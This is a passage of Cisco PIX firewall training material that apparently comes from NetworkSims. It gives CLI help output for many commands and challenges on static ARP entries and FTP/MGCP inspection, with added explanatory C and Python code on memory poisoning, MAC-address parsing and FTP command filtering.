<file spec>     Name of the file or one of startup-config, running-config
startup-config  Configuration file stored in flash
running-config  Configuration file stored in memory
<URL>           <scheme>://[<user>:<password>@]<location>[:<port>]/<pathname>[
                ;<options>]
<scheme>        Remote file system type - TFTP, FTP,
                HTTP (not available as target), HTTPS (not available as target)
<user>          User name for logging into server
<location>      The IP address (or name) of the server. Place IPv6 address
                within square brackets
<password>      Password for logging into server
<pathname>      The path and filename
<port>          Port of the remote server
<options>       One or more options of the form <option>=<value>, delimited by
                ';' character. Valid options are:
                type=<xx>
                int=<interface>
type            Valid only if FTP is used, specifies FTP mode and transfer type
<xx>            Used with type to specify the FTP type. This can be any of
                the four combinations ap, an, ip and in, where
                a- Ascii transmission mode,
                i- Image (binary) transmission mode,
                p- Passive mode,
                n- Normal or non passive mode
int             Valid only if TFTP is used, specifies the interface used to
                perform the remote access
<interface>     Name of the interface, specified using the nameif interface
                subcommand
pixfirewall# help cr
USAGE:
[show|clear] crashinfo
crashinfo test
crashinfo force [page-fault|watchdog]
[no] crashinfo save disable
show crashinfo save
DESCRIPTION:
Crashinfo
Read, write and configure crash write to flash. Force a crash.
pixfirewall# help deb
USAGE:
no debug all | undebug all
[no] debug aaa [<1-255>]
[no] debug appfw chunk|event|eventverb|regex [<1-255>]
[no] debug arp
[no] debug arp-inspection [<1-255>]
[no] debug cmgr [<1-255>]
[no] debug context [<1-255>]
[no] debug cplane [<1-255>]
[no] debug crypto isakmp [timers [<1-255>]] |
[capture <cap_name> [options]] |
[<1-255>]
[no] debug ctiqbe [<1-255>]
[no] debug ctm [<1-255>]
[no] debug dhcpc detail|error|packet [<1-255>]
[no] debug dhcpd packet|event [<1-255>]
[no] debug dhcprelay error|packet|event [<1-255>]
[no] debug disk file|filesystem|file-verbose [<1-255>]
[no] debug dns [resolver|all [<1-255>]]
[no] debug entity [<1-255>]
[no] debug fixup tcp|udp|onat [<1-255>]
[no] debug fover cable|fail|fmsg|ifc|open|rx|rxdmp|rxip|
switch|sync|tx|txdmp|txip|verify|off
[no] debug fsm [<1-255>]
[no] debug ftp client [<1-255>]
[no] debug generic [<1-255>]
[no] debug h323 h225|h245|ras [asn|event]
[no] debug http [<1-255>]
[no] debug http-map
[no] debug icmp trace [<1-255>]
[no] debug igmp [group [A.B.C.D]|interface [<if_name>]]
[no] debug ils [<1-255>]
[no] debug imagemgr [<1-255>]
[no] debug ipsec-over-tcp [<1-255>]
[no] debug ipv6 icmp|interface|nd|packet|routing
[no] debug iua-proxy [<1-255>]
[no] debug kerberos [<1-255>]
[no] debug ldap [<1-255>]
[no] debug mac-address-table [<1-255>]
[no] debug menu aaa|ipsec-over-tcp|ctm|vpnlb|ike|ipaddrutl|
qos|pki|vpnfo [LINE]
[no] debug mfib db|init|mrib|pak|ps|signal [<group_addr>]
[no] debug mgcp messages|parser|sessions
[no] debug module-boot [<1-255>]
[no] debug mrib client|io|route[<host_name>]|table
[no] debug np drops[breaks acl|all|bad-crypto|bad-ipsec-natt|
bad-ipsec-prot|bad-ipsec-udp|bad-tcp-cksum|bad-tcp-flags|
clear|ctm-error|dst-l2-lookup-fail|flow-expired|fo-standby|
ids-fail-close|ids-request|ifc-classify|inspect-dns|
inspect-icmp|intercept-unexpected|interface-down|
invalid-app-length|invalid-encap|invalid-ethertype|
invalid-ip-addr|invalid-ip-length|invalid-ip-option|
invalid-tcp|invalid-tcp-hlength|invalid-udp-length|
ip-fragment|ipsec-clearpkt-notun|ipsec-ipv6|ipsec-need-sa|
ipsec-spoof|ipsec-tun-down|ipsecudp-keepalive|l2-acl|
l2-same-lan-port|large-buf-alloc-fail|lu-invalid-pkt|
natt-keepalive|no-adjacency|no-mcast-entry|no-mcast-intrf|
no-punt-cb|no-route|np-sp-invalid-spi|queue-removed|
rate-exceeded|rpf-violated|security-failed|send-ctm-error|
show|tcp-acked|tcp-bad-option-len|tcp-bad-option-list|
tcp-bad-sack-allow|tcp-bad-winscale|tcp-buffer-full|
tcp-conn-limit|tcp-data-past-fin|tcp-discarded-ooo|
tcp-dual-open|tcp-mss-exceeded|tcp-mss-no-syn|
tcp-not-syn|tcp-paws-fail|tcp-reserved-set|
tcp-rst-syn-in-win|tcp-syn-data|tcp-synack-data|
tcp-tsopt-notallowed|tcp-winscale-no-syn|
unable-to-add-flow|unable-to-create-flow|
unimplemented|unsupport-ipv6-hdr|
unsupported-ip-version break]
[no] debug ntdomain [<1-255>]
[no] debug ntp adjust|authentication|events|loopfilter|
packets|params|select|sync|validity
[no] debug ospf [adj|database-timer|events|flood|lsa-generation|
packet|retransmission|tree|spf[external|inter|intra]]
[no] debug parser cache [<1-255>]
[no] debug asdm history <1-255>
[no] debug pim [df-election [interface <ifname>] [rp <addr>] |
group <group_addr> | interface <ifname> | neighbor]
[no] debug [pix process|uauth|cls|pkt2pc|acl[<1-4294967295>]]
[no] debug pppoe error|packet|event [<1-255>]
[no] debug pptp [<1-255>]
[no] debug radius [all|decode|session|user user_name]
[no] debug rip [<1-255>]
[no] debug rtsp [<1-255>]
[no] debug sdi [<1-255>]
[no] debug sequence [<1-255>]
[no] debug session-command [<1-255>]
[no] debug sip [<1-255>]
[no] debug skinny [<1-255>]
[no] debug smtp [<1-255>]
[no] debug sqlnet [<1-255>]
[no] debug ssh [<1-255>]
[no] debug ssl cipher|device [<1-255>]
[no] debug sunrpc [<1-255>]
[no] debug tacacs [session|user user_name]
[no] debug tcp-map
[no] debug timestamps [<1-255>]
[no] debug vpn-sessiondb [<1-255>]
[no] debug xdmcp [<1-255>]
<if_name>    Interface name.
<host_name>  Hostname or A.B.C.D IP group address.
<user_name>  User name.
DESCRIPTION:
debug  Enable debugging functions

pixfirewall# help del
USAGE:
delete [/recursive] [/noconfirm] [{disk0:|disk1:|flash:}] <path>
DESCRIPTION:
delete  Delete a file
SYNTAX:
/recursive             Recursive delete
/noconfirm             No confirmation
{disk0:|disk1:|flash:} Optional parameter that specifies the filesystem
<path>                 File to be deleted
pixfirewall# help dir
USAGE:
dir [/all] [/recursive]
[{all-filesystems | [{disk0:|disk1:|flash:}][<path>]}]
DESCRIPTION:
dir  Display the directory contents
SYNTAX:
/all                   List all files
/recursive             List files recursively
all-filesystems        List files on all filesystems
{disk0:|disk1:|flash:} Optional parameter that specifies the filesystem
<path>                 Directory or file name
pixfirewall# help dis
USAGE:
disable
DESCRIPTION:
disable  Exit from privileged mode
pixfirewall# help do
USAGE:
downgrade [/noconfirm] <image_url>
[activation-key (flash|file|<actkey>)]
[config <config_url>]
DESCRIPTION:
downgrade  Downgrade the system image. Unit will reboot with execution
           of this command.
SYNTAX:
noconfirm       Do not prompt for confirmation
<image_url>     File name or URL of the image to be downgraded with
activation-key  Specify the 4-tuple activation key to be used after downgrade
flash           Use the 4-tuple activation key last used in this unit
file            Use the activation key saved with the image file (<image_url>)
                during upgrade
<actkey>        Specify the 4-tuple activation key in the command line
config          Specify the startup configuration file to be used after
                downgrade
<config_url>    File name or URL of the configuration

Notes: The default for activation-key is to use the 4-tuple key in flash.
The default for config is to use the file downgrade.cfg in flash.
pixfirewall# help er
USAGE:
erase {disk0:|disk1:|flash:}
DESCRIPTION:
erase  Erase and format filesystem
SYNTAX:
{disk0:|disk1:|flash:}  Filesystem to be formatted

pixfirewall# help ex
USAGE:
quit|exit
DESCRIPTION:
quit  Disable, end configuration or logout
pixfirewall# help f?
format
fsck
pixfirewall# help fo
USAGE:
format {disk0:|disk1:|flash:}
DESCRIPTION:
format  Format filesystem
SYNTAX:
{disk0:|disk1:|flash:}  Filesystem to be formatted
pixfirewall# help fs
USAGE:
fsck [/nocrc] flash:
DESCRIPTION:
fsck  Perform file system check
SYNTAX:
nocrc  Skip the CRC checks during FSCK

pixfirewall# help kill
USAGE:
kill <telnet_id>
DESCRIPTION:
kill  Terminate a telnet session
SYNTAX:
<telnet_id>  Session ID as displayed by the who command
see also: who
pixfirewall# help logging
USAGE:
logging savelog [<logfile>]
clear logging [asdm | buffer]
show logging [{message [<syslog_id>|all]} | asdm | queue | setting]
show running-config [all] logging [level | disabled | rate-limit]
DESCRIPTION:
logging  Configure, show or clear logging command options or
         operational data
SYNTAX:
savelog     save logging buffer to flash
<logfile>   optional log file name on flash
disable     disabled syslog message
level       syslog message with modified level
message     display which messages are suppressed
queue       show syslog queue
rate-limit  show rate-limit info (FWSM only)
see also:   logging buffered <level>, logging queue <queue_size>

pixfirewall# help logout
USAGE:
logout
DESCRIPTION:
logout  Exit from current user profile to unprivileged mode
pixfirewall# help mem
USAGE:
show memory [detail]
[no] memory delayed-free-poisoner enable
memory delayed-free-poisoner validate
[clear|show] memory delayed-free-poisoner
DESCRIPTION:
memory  System memory utilization and diagnostic tools
SYNTAX:
detail                 Indicate the amount of total, free, used, reserved, least
                       free, most used, fragmented and allocated memory statistics.
                       By default, only the total, free, and used memory is emitted.
delayed-free-poisoner  diagnose illegal memory use
enable                 enable the tool
validate               ensure the cached memory is still valid

The delayed-free-poisoner is a tool for finding illegal reuse
of system memory. This tool, which is not enabled by default,
helps find memory corruptions by a combination of steps including:
setting memory returned to the system by the apps to poisoned
values, deferring reuse of such poisoned memory for as long as
possible by storing this memory within the tool, and finally
ensuring the poisoned values, while they are stored in the tool,
have not been unexpectedly modified.
The use of the delayed-free-poisoner has significant impact
upon the observed system memory use, processor cycles, internal
memory bus bandwidth, and if issues are found, uptime. The tool's
primary audience is development or testing environments having
suitable expectation and tolerance for the types of behaviors
the previous concerns imply; use in live or production networks
is not recommended.
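The help text above describes the delayed-free-poisoner as three steps: overwrite freed memory with a poison value, hold that memory back from reuse, and check the poison before the memory goes back to the system. The C program below is an added illustration of that scheme, not Cisco PIX code; the names dfp_malloc, dfp_free, dfp_validate and dfp_drain are this example's own, and the size header in front of each block and the eight-slot quarantine ring are simplifications assumed here so the mechanism can run on top of plain malloc. A correct program yields no findings, while a single write through a dangling pointer is reported because the block is still parked in the quarantine instead of having been recycled.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define POISON_BYTE      0xCC
#define QUARANTINE_SLOTS 8          /* a real tool holds far more than this */

/* Header in front of every block so dfp_free knows how much to poison (assumed layout). */
union hdr { size_t len; max_align_t align; };

struct held { union hdr *raw; size_t len; };   /* one quarantined block */

static struct held quarantine[QUARANTINE_SLOTS];
static size_t next_slot;            /* ring index: the oldest entry */
static size_t corrupt_total;        /* corrupted blocks seen by release() */

void *dfp_malloc(size_t len) {
    union hdr *h = malloc(sizeof *h + len);
    if (!h) return NULL;
    h->len = len;
    return h + 1;                   /* user pointer just past the header */
}

/* Step 3: does a held block still contain nothing but the poison byte? */
static int poison_intact(const struct held *b) {
    const unsigned char *p = (const unsigned char *)(b->raw + 1);
    for (size_t i = 0; i < b->len; i++)
        if (p[i] != POISON_BYTE) return 0;
    return 1;
}

/* Hand one held block back to malloc, checking the poison first. */
static void release(struct held *b) {
    if (!poison_intact(b)) {
        corrupt_total++;
        fprintf(stderr, "delayed-free-poisoner: %zu-byte block at %p written after free\n",
                b->len, (void *)(b->raw + 1));
    }
    free(b->raw);
    b->raw = NULL;
    b->len = 0;
}

/* Steps 1 and 2: poison the block, then park it instead of freeing it.
 * The oldest entry is evicted (and checked) to make room. */
void dfp_free(void *ptr) {
    if (!ptr) return;
    union hdr *h = (union hdr *)ptr - 1;
    memset(ptr, POISON_BYTE, h->len);
    struct held *slot = &quarantine[next_slot];
    if (slot->raw) release(slot);
    slot->raw = h;
    slot->len = h->len;
    next_slot = (next_slot + 1) % QUARANTINE_SLOTS;
}

/* Like "memory delayed-free-poisoner validate": count held blocks whose
 * poison has been disturbed, without releasing anything. */
size_t dfp_validate(void) {
    size_t bad = 0;
    for (size_t i = 0; i < QUARANTINE_SLOTS; i++)
        if (quarantine[i].raw && !poison_intact(&quarantine[i])) bad++;
    return bad;
}

/* Release everything held (the "no ... enable" path); returns the corrupted count. */
size_t dfp_drain(void) {
    corrupt_total = 0;
    for (size_t i = 0; i < QUARANTINE_SLOTS; i++)
        if (quarantine[i].raw) release(&quarantine[i]);
    next_slot = 0;
    return corrupt_total;
}

/* Allocate, free, optionally write through the dangling pointer, then validate.
 * With plain free() the late write would silently corrupt whatever malloc
 * handed out next; here it lands on poison inside the quarantine and is counted. */
static size_t run_demo(int write_after_free) {
    dfp_drain();
    char *buf = dfp_malloc(32);
    strcpy(buf, "session record");
    dfp_free(buf);
    if (write_after_free) buf[0] = 'X';   /* the bug: use after free */
    size_t bad = dfp_validate();
    dfp_drain();
    return bad;
}
size_t demo_clean(void)          { return run_demo(0); }   /* no findings */
size_t demo_use_after_free(void) { return run_demo(1); }   /* one corrupted block */

int main(void) {
    printf("clean program:  %zu corrupted block(s)\n", demo_clean());
    printf("use after free: %zu corrupted block(s)\n", demo_use_after_free());
    return 0;
}
```

The cost the help text warns about is visible in the design: every freed block stays resident until it is evicted, each eviction and each validate pass reads the whole block, and the ring has to be sized generously for the check to catch writes that happen long after the free. That is why the tool is meant for test environments rather than a production firewall.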
pixfirewall# help mk
USAGE:
mkdir /noconfirm [{disk0:|disk1:|flash:}] <path>
DESCRIPTION:
mkdir  Create new directory
SYNTAX:
/noconfirm             No confirmation
{disk0:|disk1:|flash:} Optional parameter that specifies the filesystem
<path>                 Directory name
pixfirewall# help more
USAGE:
more [/ascii] || [/binary] || [/ebcdic] [filesystem] <path>
DESCRIPTION:
more  Display a file's contents
SYNTAX:
/ascii        Display binary files in ascii
/binary       Force display to hex/text format
/ebcdic       Force display to ebcdic format
[filesystem]  Optional parameter that can be disk0: or disk1: or
              flash: or ftp: or http: or https: or system: or tftp:
<path>        File to display
pixfirewall# help os
USAGE:
show ospf [<pid> [<ip_addr>]]...
...interface [<interface>]
...neighbor [detail] [<interface>] [<nbr-router-id>]
...[summary-address]
...database [router | network | summary |
asbr-summary | external | nssa-external]
[<ip_addr>] [internal]
[self-originate | adv-router <ip_addr>]
...database database-summary
...request-list <nbr-router-id> <interface>
...flood-list <interface>
...retransmission-list <nbr-router-id> <interface>
...border-routers
...virtual-links
clear ospf [<pid>]
...process
...counters [neighbor [<nbr-interface>] [<nbr-id>]]
DESCRIPTION:
ospf  Show or clear OSPF information
SYNTAX:
<pid>            OSPF process ID
<nbr-router-id>  Neighbor router address
<interface>      Interface name as specified by nameif
pixfirewall# help per
USAGE:
perfmon interval <seconds>
perfmon quiet | verbose
perfmon settings
DESCRIPTION:
perfmon  Display perfmon stats or change options
SYNTAX:
show perfmon  Shows current and running average of a set of rates,
              xlate/sec, conn/sec, websense query/sec, url/sec, etc.
<seconds>     Sets the interval used to calculate the current rate
              (the default is 120 seconds).
verbose       Rather than have to type "show perfmon" over and over,
              you can use perfmon verbose to automatically print
              the stats to the console every interval seconds.
quiet         Turn verbose mode OFF.
settings      Show current interval and verbose/quiet settings.

pixfirewall# help ping
USAGE:
ping [if_name] <host> [data <pattern>] [repeat <count>] [size <bytes>]
[timeout <seconds>] [validate]
DESCRIPTION:
ping  Test connectivity from specified interface to an IP address
SYNTAX:
[if_name]  The interface name, as specified by the 'nameif' command,
           by which <host> is accessible. If not supplied, then <host>
           is resolved to an IP address and then the routing table
           is consulted to determine the destination interface.
<host>     IPv4 address, IPv6 address or name of host to ping.
<pattern>  16 bit data pattern in hex.
<count>    Repeat count.
<bytes>    Datagram size in bytes.
<seconds>  Timeout in seconds.
validate   Validate reply data.
pixfirewall# help pwd
USAGE:
pwd
DESCRIPTION:
pwd  Display the current directory
pixfirewall# help rel
USAGE:
reload [quick] [noconfirm] [save-config] [max-hold-time [hhh:]mm]
[{in [hhh:]mm | at hh:mm [{Mon dd | dd Mon}] }] [reason <text>]
reload cancel
DESCRIPTION:
reload  Halt and reload system
SYNTAX:
quick          Reload without properly shutting down each subsystem
noconfirm      Reload immediately without asking for confirmation
save-config    Save configuration before reload
max-hold-time  Maximum hold time for orderly reload
at             Reload at a specific time/date
in             Reload after a time interval
reason         Reason for reload

pixfirewall# help rena
USAGE:
rename /noconfirm [{disk0:|disk1:|flash:}] <source path>
[{disk0:|disk1:|flash:}] <destination path>
DESCRIPTION:
rename  Rename a file
SYNTAX:
/noconfirm             No confirmation
{disk0:|disk1:|flash:} Optional parameter that specifies the filesystem
<source path>          Source file path

pixfirewall# help res
USAGE:
show resource usage
[resource {<resource_name>|all}]
[counter <counter_name> [<count_threshold>]]
clear resource usage
[resource {<resource_name>|all}]
show resource types
DESCRIPTION:
resource  Display/clear system resource usage
SYNTAX:
Where:
<resource_name>    See 'show resource types' for resource names
<counter_name>     One of: current, peak, all
<count_threshold>  Only view counters at or above this threshold
Default command: 'show resource usage resource all counter all 1'

pixfirewall# help rm
USAGE:
rmdir /noconfirm [{disk0:|disk1:|flash:}] <path>
DESCRIPTION:
rmdir  Remove existing directory
SYNTAX:
/noconfirm             No confirmation
{disk0:|disk1:|flash:} Optional parameter that specifies the filesystem
<path>                 Directory name
pixfirewall# help sh
USAGE:
shun <src_ip> [<dst_ip> <sport> <dport> [<prot>]] [vlan <vlan_number>]
no shun <src_ip> [vlan <vlan_number>]
show shun [<src_ip>|statistics]
clear shun [statistics]
DESCRIPTION:
shun  Manages the filtering of packets from undesired hosts
SYNTAX:
src_ip       the IP src address of a mischievous host.
dst_ip       the IP dest. address used for connection lookup and termination.
sport        the source port for connection lookup and termination.
dport        the dest. port for connection lookup and termination.
prot         the protocol for connection lookup and termination.
vlan_number  the vlan on which the mischievous host resides.
pixfirewall# help ter
USAGE:
terminal monitor
terminal no monitor
[no] terminal pager [lines <lines>]
DESCRIPTION:
terminal

Set and reset terminal monitor or pagination

SYNTAX:
lines
number of lines per page
pixfirewall# help tra
USAGE:
show traffic
clear traffic
DESCRIPTION:
traffic
Counters for traffic statistics
pixfirewall# help u?
undebug
pixfirewall# help unde
USAGE:
no debug all | undebug all
[no] debug aaa [<1-255>]
[no] debug appfw chunk|event|eventverb|regex [<1-255>]
[no] debug arp
[no] debug arp-inspection [<1-255>]
[no] debug cmgr [<1-255>]
[no] debug context [<1-255>]
[no] debug cplane [<1-255>]
[no] debug crypto isakmp [timers [<1-255>]] |
[capture <cap_name> [options]] |
[<1-255>]
[no] debug ctiqbe [<1-255>]
[no] debug ctm [<1-255>]
[no] debug dhcpc detail|error|packet [<1-255>]
[no] debug dhcpd packet|event [<1-255>]
[no] debug dhcprelay error|packet|event [<1-255>]
[no] debug disk file|filesystem|file-verbose [<1-255>]
[no] debug dns [resolver|all [<1-255>]]
[no] debug entity [<1-255>]
[no] debug fixup tcp|udp|onat [<1-255>]
[no] debug fover cable|fail|fmsg|ifc|open|rx|rxdmp|rxip|
switch|sync|tx|txdmp|txip|verify|off
[no] debug fsm [<1-255>]
[no] debug ftp client [<1-255>]
[no] debug generic [<1-255>]
[no] debug h323 h225|h245|ras [asn|event]
[no] debug http [<1-255>]
[no] debug http-map
[no] debug icmp trace [<1-255>]
[no] debug igmp [group [A.B.C.D]|interface [<if_name>]]
[no] debug ils [<1-255>]
[no] debug imagemgr [<1-255>]
[no] debug ipsec-over-tcp [<1-255>]
[no] debug ipv6 icmp|interface|nd|packet|routing
[no] debug iua-proxy [<1-255>]
[no] debug kerberos [<1-255>]
[no] debug ldap [<1-255>]
[no] debug mac-address-table [<1-255>]
[no] debug menu aaa|ipsec-over-tcp|ctm|vpnlb|ike|ipaddrutl|
qos|pki|vpnfo [LINE]
[no] debug mfib db|init|mrib|pak|ps|signal [<group_addr>]
[no] debug mgcp messages|parser|sessions
[no] debug module-boot [<1-255>]
[no] debug mrib client|io|route[<host_name>]|table
[no] debug np drops[breaks acl|all|bad-crypto|bad-ipsec-natt|
bad-ipsec-prot|bad-ipsec-udp|bad-tcp-cksum|bad-tcp-flags|
clear|ctm-error|dst-l2-lookup-fail|flow-expired|fo-standby|
ids-fail-close|ids-request|ifc-classify|inspect-dns|
inspect-icmp|intercept-unexpected|interface-down|
invalid-app-length|invalid-encap|invalid-ethertype|
invalid-ip-addr|invalid-ip-length|invalid-ip-option|
invalid-tcp|invalid-tcp-hlength|invalid-udp-length|
ip-fragment|ipsec-clearpkt-notun|ipsec-ipv6|ipsec-need-sa|
ipsec-spoof|ipsec-tun-down|ipsecudp-keepalive|l2-acl|
l2-same-lan-port|large-buf-alloc-fail|lu-invalid-pkt|
natt-keepalive|no-adjacency|no-mcast-entry|no-mcast-intrf|
no-punt-cb|no-route|np-sp-invalid-spi|queue-removed|
rate-exceeded|rpf-violated|security-failed|send-ctm-error|
show|tcp-acked|tcp-bad-option-len|tcp-bad-option-list|
tcp-bad-sack-allow|tcp-bad-winscale|tcp-buffer-full|
tcp-conn-limit|tcp-data-past-fin|tcp-discarded-ooo|
tcp-dual-open|tcp-mss-exceeded|tcp-mss-no-syn|
tcp-not-syn|tcp-paws-fail|tcp-reserved-set|
tcp-rst-syn-in-win|tcp-syn-data|tcp-synack-data|
tcp-tsopt-notallowed|tcp-winscale-no-syn|
unable-to-add-flow|unable-to-create-flow|
unimplemented|unsupport-ipv6-hdr|
unsupported-ip-version break]
[no] debug ntdomain [<1-255>]
[no] debug ntp adjust|authentication|events|loopfilter|
packets|params|select|sync|validity
[no] debug ospf [adj|database-timer|events|flood|lsa-generation|
packet|retransmission|tree|spf[external|inter|intra]]
[no] debug parser cache [<1-255>]
[no] debug asdm history <1-255>
[no] debug pim [df-election [interface <ifname>] [rp <addr>] |
group <group_addr> | interface <ifname> | neighbor]
[no] debug [pix process|uauth|cls|pkt2pc|acl[<1-4294967295>]]
[no] debug pppoe error|packet|event [<1-255>]
[no] debug pptp [<1-255>]
[no] debug radius [all|decode|session|user user_name]
[no] debug rip [<1-255>]
[no] debug rtsp [<1-255>]
[no] debug sdi [<1-255>]
[no] debug sequence [<1-255>]
[no] debug session-command [<1-255>]
[no] debug sip [<1-255>]
[no] debug skinny [<1-255>]
[no] debug smtp [<1-255>]
[no] debug sqlnet [<1-255>]
[no] debug ssh [<1-255>]
[no] debug ssl cipher|device [<1-255>]
[no] debug sunrpc [<1-255>]
[no] debug tacacs [session|user user_name]
[no] debug tcp-map
[no] debug timestamps [<1-255>]
[no] debug vpn-sessiondb [<1-255>]
[no] debug xdmcp [<1-255>]
<if_name>    Interface name.
<host_name>  Hostname or A.B.C.D IP group address.
<user_name>  User name.
DESCRIPTION:
debug  Enable debugging functions

pixfirewall# help who


USAGE:
who [ip]
DESCRIPTION:
who
Show active administration sessions on the device
pixfirewall# help wr
USAGE:
write erase|terminal|standby
write net [<tftp_ip>]:<filename>
write [memory]
DESCRIPTION:
write  Write config to net, flash, or terminal, or erase flash.
       Write without argument defaults to write memory
SYNTAX:
erase       Clears the flash memory configuration
terminal    Display the current active configuration, not necessarily
            the saved configuration
mem         Save the active configuration to the flash, so that it will
            be the active configuration after a reload
standby     Save the active configuration on the active unit to the
            flash on the standby unit
net         Save the active configuration to the tftp server
see also:   configure
<tftp_ip>   IP address of the tftp server. Place IPv6 address
            within square brackets.
<filename>  Name of the configuration file.

Cisco PIX Challenge 53

Outline
This challenge involves configuring ARP entries.
Objectives
The objectives of this challenge are to:

Define a static ARP entry

Example
pixfirewall# sh nameif
Interface  Name     Security
Ethernet0  outside  0
Ethernet1  inside   100
Ethernet2  inf2     50
pixfirewall# config t
pixfirewall(config)# help arp
USAGE:
[no] arp <if_name> <ip> <mac> [alias]
[no] arp timeout <seconds>
show arp [statistics]
clear arp [statistics]
show running-config [all] arp [timeout]
clear configure arp
DESCRIPTION:
arp  Change or view the ARP table, add or delete static ARP entries,
     set or clear the ARP timeout value and clear ARP statistics
SYNTAX:
<if_name>   The interface name whose arp table will be changed or viewed
<ip>        IP address for an arp table entry
<mac>       Hardware 6 byte MAC address specified as XX:XX:XX:XX:XX:XX
            or XXXX.XXXX.XXXX
alias       Proxy ARP for this static entry
<seconds>   Duration for which the dynamic ARP entries will remain
            in the table
statistics  Statistics of the arp module
pixfirewall(config)# arp outside ?
configure mode commands/options:
Hostname or A.B.C.D IP address for an ARP table entry
pixfirewall(config)# arp outside 10.0.0.1 ?
configure mode commands/options:
H.H.H Hardware MAC address
pixfirewall(config)# arp outside 10.0.0.1 1.2.3 ?
configure mode commands/options:
alias Don't expire this ARP entry after timeout
<cr>
pixfirewall(config)# arp outside 10.0.0.1 1.2.3
pixfirewall(config)# arp inside 11.0.0.1 f.2.4
pixfirewall(config)# arp inf2 13.0.0.1 1.2.5
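The three static entries above use the abbreviated dotted form of the XXXX.XXXX.XXXX notation (the prompt calls it H.H.H), and the help text also allows XX:XX:XX:XX:XX:XX. As an added example, not part of the NetworkSims page or Cisco's code, the C program below parses both notations into six bytes, renders them canonically, and checks that a static entry points at a single host (neither all-zero nor a group address). The function names (parse_mac, format_mac, mac_is_unicast and the two helpers) are this example's own, and the zero-padding of short groups, so that 1.2.3 is read as 0001.0002.0003, is an assumption about how the device interprets the abbreviated form.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Read 1..max_digits hex digits from *s, advancing past them.
 * Returns the value, or -1 if there are none or too many. */
static long take_hex(const char **s, int max_digits) {
    long v = 0;
    int n = 0;
    while (isxdigit((unsigned char)**s)) {
        if (++n > max_digits) return -1;
        int c = tolower((unsigned char)**s);
        v = v * 16 + (isdigit(c) ? c - '0' : c - 'a' + 10);
        (*s)++;
    }
    return n ? v : -1;
}

/* Parse "XX:XX:XX:XX:XX:XX" or "H.H.H" into out[6]; 1 on success, 0 if malformed.
 * Assumption: colon groups hold 1 or 2 digits, dotted groups 1 to 4 digits,
 * both zero-padded, so "1.2.3" means 0001.0002.0003. */
int parse_mac(const char *text, unsigned char out[6]) {
    const char *s = text;
    unsigned char tmp[6];
    if (strchr(text, ':')) {
        for (int i = 0; i < 6; i++) {
            long v = take_hex(&s, 2);
            if (v < 0) return 0;
            tmp[i] = (unsigned char)v;
            if (i < 5 && *s++ != ':') return 0;
        }
    } else {
        for (int g = 0; g < 3; g++) {
            long v = take_hex(&s, 4);
            if (v < 0) return 0;
            tmp[2 * g]     = (unsigned char)(v >> 8);
            tmp[2 * g + 1] = (unsigned char)(v & 0xff);
            if (g < 2 && *s++ != '.') return 0;
        }
    }
    if (*s != '\0') return 0;       /* trailing characters */
    memcpy(out, tmp, 6);
    return 1;
}

/* Canonical lowercase XX:XX:XX:XX:XX:XX form; buf must hold 18 bytes. */
void format_mac(const unsigned char mac[6], char buf[18]) {
    snprintf(buf, 18, "%02x:%02x:%02x:%02x:%02x:%02x",
             mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
}

/* A static ARP entry should map an IP to one host: reject the all-zero
 * address and any address with the group (multicast/broadcast) bit set. */
int mac_is_unicast(const unsigned char mac[6]) {
    static const unsigned char zero[6] = {0};
    return memcmp(mac, zero, 6) != 0 && (mac[0] & 0x01) == 0;
}

/* Convenience: 1 if text parses and renders as canonical, else 0. */
int mac_equals(const char *text, const char *canonical) {
    unsigned char mac[6];
    char buf[18];
    if (!parse_mac(text, mac)) return 0;
    format_mac(mac, buf);
    return strcmp(buf, canonical) == 0;
}

/* 1 unicast, 0 not unicast, -1 malformed. */
int mac_text_is_unicast(const char *text) {
    unsigned char mac[6];
    if (!parse_mac(text, mac)) return -1;
    return mac_is_unicast(mac);
}

int main(void) {
    /* Constructed samples: the three values typed in this challenge, a colon
     * form, and the five-digit group typed in the IPv6 neighbor command of Challenge 55. */
    const char *samples[] = { "1.2.3", "f.2.4", "1.2.5",
                              "00:1a:2b:3c:4d:5e", "0000.1111.22222" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        unsigned char mac[6];
        char buf[18];
        if (!parse_mac(samples[i], mac)) {
            printf("%-18s malformed\n", samples[i]);
            continue;
        }
        format_mac(mac, buf);
        printf("%-18s -> %s%s\n", samples[i], buf,
               mac_is_unicast(mac) ? "" : "  (not a unicast address)");
    }
    return 0;
}
```

The unicast check matters because a static entry with a group address or an all-zero address will never match a real host and is usually a typo; catching it before the entry is committed is cheaper than debugging the resulting unreachable neighbour.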

Cisco PIX Challenge 54


Outline
This challenge involves configuring FTP and MGCP inspection.
Objectives
The objectives of this challenge are to:

Define FTP and MGCP inspection.

Example
pixfirewall(config)# ftp-map ftpm
pixfirewall(config-ftp-map)# ?
Ftp-map configuration commands:
mask-syst-reply  Mask reply to syst command
no               Negate a command or set its defaults
request-command  FTP request command inspection
pixfirewall(config-ftp-map)# mask- ?
ftp-map mode commands/options:
<cr>
pixfirewall(config-ftp-map)# re ?
ftp-map mode commands/options:
deny Specify FTP request commands to block
pixfirewall(config-ftp-map)# re den ?
ftp-map mode commands/options:
appe  Append to a file
cdup  Change to parent of current directory
dele  Delete a file at server site
get   FTP client command for the retr command - retrieve a file
help  Help information from server
mkd   Create a directory
put   FTP client command for the stor command - store a file
rmd   Remove a directory
rnfr  Rename from
rnto  Rename to
site  Specify server specific command
stou  Store a file with a unique name
pixfirewall(config-ftp-map)# exit
pixfirewall(config)# mgcp-map mmap
pixfirewall(config-mgcp-map)# ?

NetworkSims.com

535

mgcp-map configuration commands:


call-agent
Add a Call-Agent
command-queue Configure Command Queue
gateway
Add a Gateway
help
Help for mgcp-map configuration commands
no
Negate or set default values of a command
pixfirewall(config-mgcp-map)# call ?
mgcp-map mode commands/options:
A.B.C.D IP address
pixfirewall(config-mgcp-map)# gat ?
mgcp-map mode commands/options:
A.B.C.D IP address
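As an added example (not from the NetworkSims material), the Python below models what the ftp-map above does on the FTP control channel: it parses a constructed ftp-map body, maps the client-side names get and put onto the protocol verbs RETR and STOR as the help text describes, marks the denied commands in a constructed client session, and masks the 215 reply to SYST. The ftp-map body and the session lines are constructed; replacing the masked reply text with X characters is an assumption, since the page only says the reply is masked.

```python
from dataclasses import dataclass, field

# Two names in the deny list are client-side verbs for the real protocol commands,
# exactly as the help text says: get -> RETR, put -> STOR.
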